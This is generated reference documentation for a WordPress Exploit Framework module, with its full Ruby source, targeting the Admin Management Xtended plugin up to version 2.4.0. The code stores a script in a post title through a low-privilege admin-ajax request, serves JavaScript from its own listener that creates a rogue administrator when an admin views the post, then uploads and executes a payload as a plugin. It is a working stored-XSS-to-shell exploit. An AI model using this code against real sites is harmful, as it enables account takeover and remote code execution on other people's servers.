Class: Wpxf::Exploit::AdminManagementXtendedXssShellUpload

Inherits:
Module
  • Object
Includes:
Wpxf, WordPress::Login, WordPress::Plugin, WordPress::Posts, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::Xss

#wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods included from WordPress::Posts

#get_post_id_from_body, #get_post_id_from_permalink

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ AdminManagementXtendedXssShellUpload

Returns a new instance of AdminManagementXtendedXssShellUpload.



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 10

# Registers the module metadata and the options this module reads
# (username, password, post_id, permalink, post_title).
#
# The description is the only in-file statement of the affected versions
# ("<= 2.4.0"); #check compares the readme version against '2.4.0.1'.
def initialize
  super

  description = [
    'This module exploits a lack of user level validation in versions',
    '<= 2.4.0 of the Admin Management Xtended plugin which',
    'allows authenticated users of any level to update the title of',
    'any post, which allows the module to store a script that will',
    'create a new admin user and use the new credentials to',
    'upload and execute a payload when an admin views the page.'
  ].join(' ')

  update_info(
    name: 'Admin Management Xtended XSS Shell Upload',
    desc: description,
    author: [
      'Kacper Szurek', # Vulnerability discovery
      'rastating'      # WPXF module
    ],
    references: [
      ['URL', 'http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html'],
      ['WPVDB', '8354']
    ],
    date: 'Oct 27 2015'
  )

  # Both credential options share the same shape; only the name differs.
  credential_options = %w[username password].map do |option_name|
    StringOption.new(
      name: option_name,
      desc: "The WordPress #{option_name} to authenticate with",
      required: true
    )
  end

  # Exactly one of post_id / permalink is needed; #run enforces that.
  target_options = [
    IntegerOption.new(
      name: 'post_id',
      desc: 'The post ID of the post to change the title of',
      required: false
    ),
    StringOption.new(
      name: 'permalink',
      desc: 'The permalink to the post to change the title of',
      required: false
    ),
    StringOption.new(
      name: 'post_title',
      desc: 'The new title to use for the post',
      required: true
    )
  ]

  register_options(credential_options + target_options)
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 61

# Version check driven by the plugin's readme.
#
# Delegates to check_plugin_version_from_readme for the
# 'admin-management-xtended' slug with '2.4.0.1' as the boundary version.
# NOTE(review): presumably "vulnerable when below 2.4.0.1" — confirm the
# comparison direction in WordPress::Fingerprint.
def check
  plugin_slug = 'admin-management-xtended'
  boundary_version = '2.4.0.1'
  check_plugin_version_from_readme(plugin_slug, boundary_version)
end

#on_http_request(path, params, headers) ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 132

# Callback for every request the module's HTTP server receives.
#
# A request carrying both the 'u' and 'p' parameters is treated as the
# report-back from the served JavaScript; every other request is answered
# with the user-creation script itself. Nothing in this method checks who
# the caller is, so any client that can reach the listener can trigger the
# second phase with whatever 'u'/'p' values it sends.
#
# @param path [String] request path (not used here)
# @param params [Hash] query parameters keyed by String
# @param headers [Hash] request headers (not used here)
# @return [String] response body
def on_http_request(path, params, headers)
  reported_user = params['u']
  reported_pass = params['p']

  unless reported_user && reported_pass
    emit_info 'Incoming request received, serving JavaScript...'
    return wordpress_js_create_user
  end

  emit_success "Created a new administrator user, #{reported_user}:#{reported_pass}"
  stop_http_server

  emit_info 'Removing script from post title...'
  update_post_title(@cookie, @post_id, datastore['post_title'])

  # #run returns this ivar, so the outcome of the second phase lands here.
  @success = upload_shell(reported_user, reported_pass)

  ''
end

#run ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 78

# Entry point: authenticates, resolves the target post, stores the script
# in its title and then waits for the callback handled by #on_http_request.
#
# post_id wins when both post_id and permalink are set. Returns false on
# any failure before the listener starts; afterwards returns @success,
# which #on_http_request sets once the report-back arrives.
#
# The title is written through the admin-ajax action 'ame_save_title'
# (see #update_post_title); that request, and a post title containing a
# <script> tag, are the server-side traces this phase leaves.
def run
  return false unless super

  @cookie = authenticate_with_wordpress(datastore['username'], datastore['password'])
  return false unless @cookie

  id_given = !datastore['post_id'].nil?
  permalink_given = !datastore['permalink'].nil?

  if !id_given && !permalink_given
    emit_error 'Either the post_id or permalink option must be set'
    return false
  end

  @post_id = 0
  if id_given
    if permalink_given
      emit_warning 'Both post_id and permalink options were specified'
      emit_warning 'Ignoring permalink and using post_id'
    end
    @post_id = normalized_option_value('post_id')
  else
    emit_info 'Extracting post ID from permalink...'
    @post_id = get_post_id_from_permalink(datastore['permalink'])
    if @post_id.nil?
      emit_error 'Failed to extract the post ID'
      return false
    end
  end

  # The outcome is decided later by #on_http_request, so start pessimistic.
  @success = false

  emit_info 'Storing script...'
  emit_info xss_include_script, true
  stored_title = "#{datastore['post_title']}<script>#{xss_include_script}</script>"
  res = update_post_title(@cookie, @post_id, stored_title)

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  unless res.code == 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_success "Script stored and will be executed when a user views the post"
  start_http_server

  @success
end

#update_post_title(cookie, post_id, title) ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 65

# Sends the plugin's admin-ajax 'ame_save_title' request to set a post title.
#
# NOTE(review): the post ID is sent under a field named 'category_id';
# the name comes from the plugin's handler, not from this module — verify
# against the plugin source if the request stops working.
#
# @param cookie [String] session cookie of the authenticated user
# @param post_id [Integer, String] ID of the post to rename; sent as a String
# @param title [String] new title, sent unmodified
# @return the result of execute_post_request; #run treats nil as "no response"
def update_post_title(cookie, post_id, title)
  form_fields = {
    'category_id' => post_id.to_s,
    'new_title' => title,
    'submit' => 'Change'
  }

  execute_post_request(
    url: wordpress_url_admin_ajax,
    params: { 'action' => 'ame_save_title' },
    body: form_fields,
    cookie: cookie
  )
end

#upload_shell(username, password) ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/admin_management_xtended_xss_shell_upload.rb', line 150

# Second phase: logs in with the administrator account reported by the
# script, uploads the payload as a plugin and requests it once.
#
# Returns false if the login or the upload fails. Returns true as soon as
# the upload succeeded, whatever the execution request returned — the
# result body is only echoed when it came back with 200 and was non-blank.
# Plugin and payload names are random (Utility::Text.rand_alpha), so the
# resulting path is only known from the emit_info line below.
#
# @param username [String] administrator username reported by the script
# @param password [String] matching password
# @return [Boolean]
def upload_shell(username, password)
  admin_cookie = authenticate_with_wordpress(username, password)
  return false unless admin_cookie

  emit_info 'Uploading payload...'
  plugin_name = Utility::Text.rand_alpha(10)
  payload_name = Utility::Text.rand_alpha(10)
  uploaded = upload_payload_as_plugin(plugin_name, payload_name, admin_cookie)
  unless uploaded
    emit_error 'Failed to upload the payload'
    return false
  end

  payload_url = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
  emit_info "Executing the payload at #{payload_url}..."
  res = execute_get_request(url: payload_url)

  produced_output = res && res.code == 200 && !res.body.strip.empty?
  emit_success "Result: #{res.body}" if produced_output

  true
end